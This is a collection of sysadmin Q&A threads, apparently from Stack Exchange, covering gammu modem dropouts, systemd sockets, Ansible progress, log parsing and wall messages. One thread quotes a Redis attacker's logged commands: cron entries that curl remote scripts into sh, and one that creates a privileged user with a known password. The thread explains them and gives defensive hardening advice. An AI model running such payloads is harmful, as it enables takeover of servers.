Gammu stops receiving SMS after a while - gammu

I have a problem that's been bugging me for a while now. I've been searching for a solution for two weeks without any result. These guys have the same problem as I do, but there are no answers there.
I'm running gammu (1.31) and gammu-smsd on a Raspberry Pi with Raspbian.
Using a Huawei E367.
I don't know why I get three devices: /dev/ttyUSB0, /dev/ttyUSB1 and /dev/ttyUSB2.
Since I don't know the difference between them, I tried different settings and got it running with the following: gammurc on ttyUSB0 and gammu-smsdrc on ttyUSB2. Both as root and as a normal user.
Sending SMS works great. Then comes the problem: receiving SMS works for a while, then just stops. If I reboot the system it starts working again, but after a while the same thing happens.
# Configuration file for Gammu SMS Daemon
# Gammu library configuration, see gammurc(5)
[gammu]
# Please configure this!
port = /dev/ttyUSB2
connection = at
# Debugging
#logformat = textall
# SMSD configuration, see gammu-smsdrc(5)
[smsd]
service = files
logfile = /home/pi/gammu/log/log_smsdrc.txt
# Increase for debugging information
debuglevel = 0
# Paths where messages are stored
inboxpath = /home/pi/gammu/inbox/
outboxpath = /home/pi/gammu/outbox/
sentsmspath = /home/pi/gammu/sent/
errorsmspath = /home/pi/gammu/error/
ReceiveFrequency = 2
LoopSleep = 1
GammuCoding = utf8
CommTimeout = 0
#RunOnReceive =
Log
Tue 2015/03/31 11:05:19 gammu-smsd[7379]: Starting phone communication...
Tue 2015/03/31 11:07:07 gammu-smsd[7379]: Terminating communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2091]: Warning: No PIN code in /etc/gammu-smsdrc file
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Created POSIX RW shared memory at 0xb6f6d000
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Error at init connection: Error opening device, it doesn't exist. (DEVICENOTEXIST[4])
Tue 2015/03/31 11:07:26 gammu-smsd[2116]: Going to 30 seconds sleep because of too much connection errors
Tue 2015/03/31 11:08:14 gammu-smsd[2116]: Starting phone communication...
Tue 2015/03/31 11:08:21 gammu-smsd[2116]: Soft reset return code: Function not supported by phone. (NOTSUPPORTED[21])
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Read 2 messages
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110600_00_+xxxxxx_00.txt
Tue 2015/03/31 11:08:27 gammu-smsd[2116]: Received
IN20150331_110820_00_+xxxxxx_00.txt
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:09:38 gammu-smsd[2116]: Received
IN20150331_110934_00_+xxxxxx_00.txt
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Read 1 messages
Tue 2015/03/31 11:13:57 gammu-smsd[2116]: Received
IN20150331_111352_00_+xxxxxx_00.txt
I guess the early DEVICENOTEXIST errors happen before my usb_modeswitch command kicks in.
In rc.local:
sudo usb_modeswitch -v 0x12d1 -p 0x1446 -V 0x12d1 -P 0x1506 -m 0x01 -M 55534243123456780000000000000011062000000100000000000000000000 -I

I have the same problem, so I wrote a shell script that quickly reactivates the vanished /dev/ttyUSB[0-2] device, and added it as a cron job:
*/5 * * * * /home/sysadmin/scripts/reanimate-usb-stick.sh >/dev/null 2>&1
reanimate-usb-stick.sh
#!/bin/bash
export PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"

# Count how many /dev/ttyUSB* nodes currently exist.
USBDEVICES=$(ls -l /dev/* | awk '/\/dev\/ttyUSB[0-7]/ {print $6}' | wc -l)
DEVICEINFO=""
DEVICEPORT=""

if [ "$USBDEVICES" -eq 0 ]
then
    # No serial nodes left: read the Huawei stick's vendor and product ID from lsusb.
    datas=$(lsusb | grep -i hua | awk '/Bus/ {print $6}' | tr ":" "\n")
    counter=0
    for line in $datas
    do
        counter=$((counter+1))
        if [ "$counter" -eq 1 ]
        then
            DEVICEINFO="$line"
        fi
        if [ "$counter" -eq 2 ]
        then
            DEVICEPORT="$line"
        fi
    done
    # Switch the stick back to modem mode so the ttyUSB nodes come back.
    usb_modeswitch -v "$DEVICEINFO" -p "$DEVICEPORT" -J
    echo "$DEVICEINFO - $DEVICEPORT"
else
    echo "ALL OK : $USBDEVICES"
    exit
fi
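A possible extension (not part of the original script, just a hedged sketch): after the mode switch, gammu-smsd may still be holding the old, dead file descriptor, so restarting the daemon once the ttyUSB nodes are back can help. Assuming the init script name used by the Debian/Raspbian package:
sleep 10                      # give the kernel time to recreate /dev/ttyUSB*
service gammu-smsd restart    # make the daemon reopen the port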

This looks pretty much the same as https://github.com/gammu/gammu/issues/4, and even though there have been some attempts to fix this in Gammu, it seems that the Huawei modem firmware is simply not stable enough for this usage. Simply asking it repeatedly to list received messages makes it unresponsive.
Also, which device node you use might make a slight difference; see the Gammu manual and the dd-wrt wiki for more information on that topic.

I had a similar problem with a Huawei 3G modem (E1750). I added the following lines to the /etc/gammu-smsdrc file:
ReceiveFrequency = 60
StatusFrequency = 60
CommTimeout = 60
SendTimeout = 60
LoopSleep = 10
CheckSecurity = 0
The idea is to minimize the amount of communication between gammu-smsd and the 3G modem. In particular, the default LoopSleep = 1 means that gammu sends commands to the modem every second, which can be too much for the modem firmware, so I used 10.
The next thing is standard in all Raspberry Pi/ARM embedded projects: use a powerful power supply. I'm using a charger with a fixed cable (I believe some detachable cables may be inadequate for currents above 2 A) that looks like this:
http://botland.com.pl/9240-thickbox_default/zasilacz-extreme-microusb-5v-21a-raspberry-pi.jpg
With that, the modem still hangs after about 50-100 hours of operation, but it's enough for my project.

Related

Communicating with Systemd service through socket mapped to stdin

I'm creating my first background service and I want to communicate with it through a socket.
I have the following script /tmp/myservice.sh:
#! /usr/bin/env bash
while read received_cmd
do
echo "Received command ${received_cmd}"
done
And the following socket unit, /etc/systemd/user/myservice.socket:
[Unit]
Description=Socket to communicate with myservice
[Socket]
ListenSequentialPacket=/tmp/myservice.socket
And the following service:
[Unit]
Description=A simple service example
[Service]
ExecStart=/bin/bash /tmp/myservice.sh
StandardError=journal
StandardInput=socket
StandardOutput=socket
Type=simple
The idea is to understand how to communicate with a background service, here using a Unix file socket. The script works well when launched from the shell and reading stdin, and I thought that by setting StandardInput=socket it would read from the socket the same way.
Nevertheless, when I run nc -U /tmp/myservice.socket the command returns right away and I have the following output:
$ journalctl --user -u myservice
-- Logs begin at Sat 2020-10-24 17:26:25 BST, end at Thu 2020-10-29 14:00:53 GMT. --
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21941]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21942]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21943]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21944]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: Started A simple service example.
Oct 29 08:40:16 shiny bash[21945]: /tmp/myservice.sh: line 3: read: read error: 0: Invalid argument
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Succeeded.
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Start request repeated too quickly.
Oct 29 08:40:16 shiny systemd[1689]: myservice.service: Failed with result 'start-limit-hit'.
Oct 29 08:40:16 shiny systemd[1689]: Failed to start A simple service example.
Did I misunderstand how sockets work? Why does read fail to read from the socket? Should I use another mechanism to communicate with my background service (as I said, it's my first background service, so I may be doing unconventional things here)?
The only thing I have seen working with a shell script is ListenStream= rather than ListenSequentialPacket=. (Obviously, this means you lose packet boundaries, but the shell read is usually oriented to read lines ending \n from streams, so it is not usually a problem).
But the most important thing that is missing is the extra Accept line:
[Socket]
ListenStream=...
Accept=true
As I understand it, without this the service will be passed a socket on which it must first do a socket accept() call, to get the actual connection socket (hence the read error). The service must also then handle all further connections.
By using Accept=true, a new service will be started for each new connection, and will be passed the immediately usable socket. Note, however, that this means the service must now be templated, i.e. called myservice@.service rather than myservice.service.
(For datagram sockets, Accept must be left at its default of false.) See man systemd.socket.
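Putting those pieces together, a minimal sketch of the two units (untested, reusing the names and paths from the question; note the @ in the service file name):
/etc/systemd/user/myservice.socket
[Unit]
Description=Socket to communicate with myservice
[Socket]
ListenStream=/tmp/myservice.socket
Accept=true
/etc/systemd/user/myservice@.service
[Unit]
Description=A simple service example
[Service]
ExecStart=/bin/bash /tmp/myservice.sh
StandardInput=socket
StandardOutput=socket
StandardError=journal
After systemctl --user daemon-reload and systemctl --user start myservice.socket, each nc -U /tmp/myservice.socket connection should get its own service instance reading from that connection.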

attempt to hack host machine via redis open port

I have Redis with an open port on my development machine. These days someone is trying to get access to my host machine via Redis. I have a console with Redis monitoring, and these are the commands they used to try to get access. I provide the date and time for some commands as well.
GMT: Monday, August 21, 2017 4:47:53.384 AM [0 74.82.47.3:46986] "INFO"
[0 94.74.81.202:55564] "COMMAND"
[0 94.74.81.202:55564] "flushall"
[0 94.74.81.202:55606] "COMMAND"
GMT: Monday, August 21, 2017 9:21:43.586 AM [0 94.74.81.202:55606] "set" "crackit" "\n\n\nssh-rsa .....<ssh_key>.... redis#redis.io\n\n\n\n"
[0 94.74.81.202:55646] "COMMAND"
[0 185.163.109.66:40470] "INFO"
[0 185.163.109.66:40470] "SCAN" "9000"
[0 74.82.47.5:39660] "INFO"
[0 98.142.140.13:51586] "INFO"
[0 98.142.140.13:51586] "SET" "sxyxgboqet" "\n\n*/1 * * * * /usr/bin/curl -fsSL http://98.142.140.13:8220/test11.sh | sh\n\n"
[0 52.14.111.241:58464] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\tcurl http://112.74.29.139:8898/1.sh|bash\n\n"
[0 106.2.120.103:41329] "INFO"
GMT: Tuesday, August 22, 2017 9:56:04.350 PM [0 178.62.175.211:58716] "eval" "local asnum ... see link below "
... the full lua script ...
[0 184.105.247.252:33152] "INFO"
GMT: Wednesday, August 23, 2017 7:18:35.995 AM [0 52.14.111.241:49208] "SET" "lololili" "\n\n*/1\t*\t*\t*\t*\troot\t(useradd -G root axis2;(echo 'asdf1234' | passwd --stdin axis2) || (echo 'axis2:
asdf1234' |chpasswd));crontab -r;:>/etc/crontab;\n\n"
GMT: Wednesday, August 23, 2017 6:04:36.397 PM [0 98.142.140.13:43540] "INFO"
GMT: Thursday, August 24, 2017 5:22:26.931 AM [0 216.218.206.68:19396] "INFO"
These lines are from my redis.log file:
22 Aug 09:59:29.865 AM * RDB: 6 MB of memory used by copy-on-write
22 Aug 09:59:29.951 AM * Background saving terminated with success
22 Aug 09:59:30.137 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.049 AM * 1 changes in 900 seconds. Saving...
23 Aug 07:18:36.052 AM * Background saving started by pid 25388
23 Aug 07:18:36.054 AM # Failed opening the RDB file crontab (in server root dir /etc) for saving: Permission denied
23 Aug 07:18:36.153 AM # Background saving error
.............
repeated every 6 minutes
Can anybody explain what exactly the Lua script is doing? According to the Redis log, I guess it tried to eval a bash command held in the "lololili" key.
Thank you in advance.
Hi, it's an attempt to hack your machine. You should not expose your Redis instance on the internet without proper firewalling.
Judging by what I've seen, I guess this one is trying to escape the Lua sandbox.
There are multiple ways to hack your machine if you have an open Redis server:
by escaping the Lua sandbox (tried successfully on a Redis 2.8.4 with the gist linked below, slightly modified)
by uploading bad scripts in an attempt to get them executed by you or your software by mistake (using the DB dump to write files, as with the crontab attempts in your log)
Some references on the Lua sandbox escape:
http://benmmurphy.github.io/blog/2015/06/04/redis-eval-lua-sandbox-escape/
https://gist.github.com/firsov/4393cc162ff87e00324a6a53a353bda2
And on Redis file upload:
https://packetstormsecurity.com/files/134200/Redis-Remote-Command-Execution.html
You should check for any files owned by the redis user on your host:
find / -user redis
If you find nothing, good for you, but secure your server.
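As a follow-up to "secure your server": a minimal hardening sketch for redis.conf (these are standard Redis directives; the values are placeholders, adjust for your setup):
# Listen only on localhost instead of every interface
bind 127.0.0.1
# Refuse outside clients unless explicitly configured (Redis 3.2+)
protected-mode yes
# Require authentication from every client
requirepass change-me-to-a-long-random-string
# Disable the CONFIG command, which attackers typically use to point the RDB dump at files like /etc/crontab
rename-command CONFIG ""
Combined with a firewall rule that only allows trusted hosts to reach port 6379, this blocks the dir/dbfilename trick visible in your log.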

How can I show progress for a long-running Ansible task?

I have some Ansible tasks that perform unfortunately long operations - things like running a synchronization operation against an S3 folder. It's not always clear whether they're progressing or just stuck (or whether the ssh connection has died), so it would be nice to have some sort of progress output displayed. If the command's stdout/stderr were displayed directly, I'd see that, but Ansible captures the output.
Piping output back is a difficult problem for Ansible to solve in its current form. But are there any Ansible tricks I can use to provide some sort of indication that things are still moving?
Current ticket is https://github.com/ansible/ansible/issues/4870
I came across this problem today on OSX, where I was running a docker shell command which took a long time to build and there was no output whilst it built. It was very frustrating to not understand whether the command had hung or was just progressing slowly.
I decided to pipe the output (and error) of the shell command to a port, which could then be listened to via netcat in a separate terminal.
myplaybook.yml
- name: run some long-running task and pipe to a port
  shell: myLongRunningApp > /dev/tcp/localhost/4000 2>&1
And in a separate terminal window:
$ nc -lk 4000
Output from my
long
running
app will appear here
Note that I pipe the error output to the same port; I could as easily pipe to a different port.
Also, I ended up setting a variable called nc_port which will allow for changing the port in case that port is in use. The ansible task then looks like:
shell: myLongRunningApp > /dev/tcp/localhost/{{nc_port}} 2>&1
Note that the command myLongRunningApp is being executed on localhost (i.e. that's the host set in the inventory) which is why I listen to localhost with nc.
Ansible has since implemented the following:
---
# Requires ansible 1.8+
- name: 'YUM - async task'
  yum:
    name: docker-io
    state: installed
  async: 1000
  poll: 0
  register: yum_sleeper

- name: 'YUM - check on async task'
  async_status:
    jid: "{{ yum_sleeper.ansible_job_id }}"
  register: job_result
  until: job_result.finished
  retries: 30
For further information, see the official documentation on the topic (make sure you're selecting your version of Ansible).
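One optional refinement (delay is a standard parameter of until/retries loops, not something from the original example): the interval between status checks defaults to 5 seconds and can be widened for very long tasks:
- name: 'YUM - check on async task'
  async_status:
    jid: "{{ yum_sleeper.ansible_job_id }}"
  register: job_result
  until: job_result.finished
  retries: 30
  delay: 10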
There's a couple of things you can do, but as you have rightly pointed out, Ansible in its current form doesn't really offer a good solution.
Official-ish solutions:
One idea is to mark the task as async and poll it. Obviously this is only suitable if it is capable of running in such a manner without causing failure elsewhere in your playbook. The async docs are here and here's an example lifted from them:
- hosts: all
  remote_user: root
  tasks:
    - name: simulate long running op (15 sec), wait for up to 45 sec, poll every 5 sec
      command: /bin/sleep 15
      async: 45
      poll: 5
This can at least give you a 'ping' to know that the task isn't hanging.
The only other officially endorsed method would be Ansible Tower, which has progress bars for tasks but isn't free.
Hacky-ish solutions:
Beyond the above, you're pretty much going to have to roll your own. Your specific example of synching an S3 bucket could be monitored fairly easily with a script periodically calling the AWS CLI and counting the number of items in a bucket, but that's hardly a good, generic solution.
The only thing I could imagine being somewhat effective would be watching the incoming ssh session from one of your nodes.
To do that, you could configure the ansible user on that machine to connect via screen and actively watch it. Alternatively, you could use the log_output option in the sudoers entry for that user, allowing you to tail the log file. Details of log_output can be found in the sudoers man page.
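A hedged sketch of what such a sudoers entry could look like (the ansible user name and the log directory are assumptions; edit with visudo):
# e.g. in a drop-in like /etc/sudoers.d/ansible-iolog (hypothetical file name)
Defaults:ansible log_output
Defaults:ansible iolog_dir=/var/log/sudo-io/%{user}
You can then tail -f the newest file under that directory while the task runs, or replay a finished session with sudoreplay.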
If you're on Linux you may use systemd-run to create a transient unit and inspect the output with journalctl, like:
sudo systemd-run --unit foo \
bash -c 'for i in {0..10}; do
echo "$((i * 10))%"; sleep 1;
done;
echo "Complete"'
And in another session
sudo journalctl -xf --unit foo
It would output something like:
Apr 07 02:10:34 localhost.localdomain systemd[1]: Started /bin/bash -c for i in {0..10}; do echo "$((i * 10))%"; sleep 1; done; echo "Complete".
-- Subject: Unit foo.service has finished start-up
-- Defined-By: systemd
-- Support: https://lists.freedesktop.org/mailman/listinfo/systemd-devel
--
-- Unit foo.service has finished starting up.
--
-- The start-up result is done.
Apr 07 02:10:34 localhost.localdomain bash[10083]: 0%
Apr 07 02:10:35 localhost.localdomain bash[10083]: 10%
Apr 07 02:10:36 localhost.localdomain bash[10083]: 20%
Apr 07 02:10:37 localhost.localdomain bash[10083]: 30%
Apr 07 02:10:38 localhost.localdomain bash[10083]: 40%
Apr 07 02:10:39 localhost.localdomain bash[10083]: 50%
Apr 07 02:10:40 localhost.localdomain bash[10083]: 60%
Apr 07 02:10:41 localhost.localdomain bash[10083]: 70%
Apr 07 02:10:42 localhost.localdomain bash[10083]: 80%
Apr 07 02:10:43 localhost.localdomain bash[10083]: 90%
Apr 07 02:10:44 localhost.localdomain bash[10083]: 100%
Apr 07 02:10:45 localhost.localdomain bash[10083]: Complete
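One small follow-up, assuming the unit name foo from above: if the command fails, the transient unit stays around in a failed state and blocks reuse of the name, so it may need cleaning up afterwards:
sudo systemctl stop foo            # if it is still running
sudo systemctl reset-failed foo    # clear a failed transient unit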

Parsing entry name from a log

Writing bash parsing scripts is my own personal nightmare, so here I am.
The server log format is below:
197 INFO Thu Mar 27 10:10:32 2014
seq_1_1..JobControl (DSWaitForJob): Waiting for job job_1_1_1 to finish
198 INFO Thu Mar 27 10:10:36 2014
seq_1_1..JobControl (DSWaitForJob): Job job_1_1_1 has finished, status = 3 (Aborted)
199 WARNING Thu Mar 27 10:10:36 2014
seq_1_1..JobControl (#job_1_1_1): Job job_1_1_1 did not finish OK, status = 'Aborted'
From here I need to parse out the string which follows the format:
Job job_name has finished, status = 3 (Aborted)
So from the output above I should get: job_1_1_1
What would the script for that look like, given that I get this server log as the output of a certain command?
Thanks xx
Using grep -P:
grep -oP '\w+(?= has finished, status = 3)' file
job_1_1_1
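If your grep doesn't support -P (PCRE), a sed sketch under the same assumption about the message format:
sed -n 's/.*Job \(.*\) has finished, status = 3.*/\1/p' file
job_1_1_1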

How to suppress EOF when echoing messages to wall from a script

In my bash script, I use many echo "......." | wall lines to broadcast event notifications as they occur.
However, the resulting output on the console gets unwieldy:
Broadcast Message from root@BIGFOOT
(somewhere) at 16:07 ...
Photo backup started on Mon Oct 7 16:07:55 PHT 2013
Broadcast Message from root@BIGFOOT
(somewhere) at 16:08 ...
Photo backup successfully finished on Mon Oct 7 16:08:05 PHT 2013
Broadcast Message from root@BIGFOOT
(somewhere) at 16:08 ...
You may now unplug the Photo Backup HDD.
Instead, we'd like it to appear more like the following,
Broadcast Message from root@BIGFOOT
(somewhere) at 16:07 ...
Photo backup started on Mon Oct 7 16:07:55 PHT 2013
Photo backup successfully finished on Mon Oct 7 16:08:05 PHT 2013
You may now unplug the Photo Backup HDD.
which is kind of like what would appear in an open write chat session.
Is this possible? If so, how should I modify my script in order to achieve the desired console output?
Each wall invocation will add the "Broadcast Message" banner and a blank line at the top of its output.
As a result, if you want to notify your users in a timely manner (i.e. actually at the start and end of the backup), then you will have to live with the banner message.
As @devnull suggested, you could batch up the messages. One approach would be to declare a script-wide variable, say logmsg, and then have two functions, depending on whether it is something you want the user to know eventually or something they need to know now:
function log_message
{
    # append the new message to the batch (no $ and no spaces around = in an assignment)
    logmsg="${logmsg}\n$1"
}

function log_message_now
{
    log_message "$1"
    # -e makes echo expand the \n separators before handing the batch to wall
    echo -e "$logmsg" | wall
    logmsg=""
}
(note I've not actually tested the above, so may need a touch of debugging!)
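A possible way to use the two helpers in the backup script (the message text mirrors the question and is purely illustrative):
log_message "Photo backup started on $(date)"
# ... run the actual backup here ...
log_message "Photo backup successfully finished on $(date)"
log_message_now "You may now unplug the Photo Backup HDD."
All three messages are then broadcast together, under a single banner, when log_message_now is called.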
Use a compound command:
{
    echo "line1"
    echo "line2"
    echo "line3"
} | wall
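Applied to the messages from the question, related lines can be grouped so they share a single banner (bear in mind that wall reads its whole input before broadcasting, so the batch only appears once the block has finished):
{
    echo "Photo backup successfully finished on $(date)"
    echo "You may now unplug the Photo Backup HDD."
} | wall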
